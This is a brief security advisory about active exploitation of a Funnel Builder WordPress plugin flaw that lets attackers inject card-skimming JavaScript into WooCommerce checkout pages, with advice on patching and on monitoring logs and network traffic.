Active exploitation of Funnel Builder plugin vulnerability exposes WooCommerce payment data

Funnel Builder is a widely deployed WordPress plugin used to construct sales funnels and landing pages, making this vulnerability particularly dangerous given its position in the payment processing chain. The flaw permits unauthenticated attackers to inject malicious JavaScript directly into checkout pages, allowing them to harvest credit card details as customers complete purchases. This is a supply-chain compromise with direct financial consequences for every merchant running the affected plugin version.

The attack surface is significant because WordPress plugins are frequently neglected by organisations that treat them as fire-and-forget installations. Plugin vulnerabilities offer attackers a reliable path to compromise thousands of shops simultaneously without needing to breach individual targets. A single unpatched plugin can become a pivot point for payment fraud affecting customer bases across multiple retailers.

Merchants using Funnel Builder with WooCommerce should immediately verify their plugin version and apply available patches. This is not an issue that can be addressed at the application level; only plugin updates or deactivation will stop the injection. Security teams should review audit logs for indicators of checkout page modification and analyse network traffic from checkout domains for exfiltration of payment data.

The broader implication is that many organisations continue to operate WordPress deployments with inadequate patch management processes. Commercial payment card theft through plugin vulnerabilities remains a high-volume attack vector precisely because the remediation path is simple but often neglected. Active exploitation suggests threat actors have integrated this into automated scanning and deployment tools, making rapid patching essential.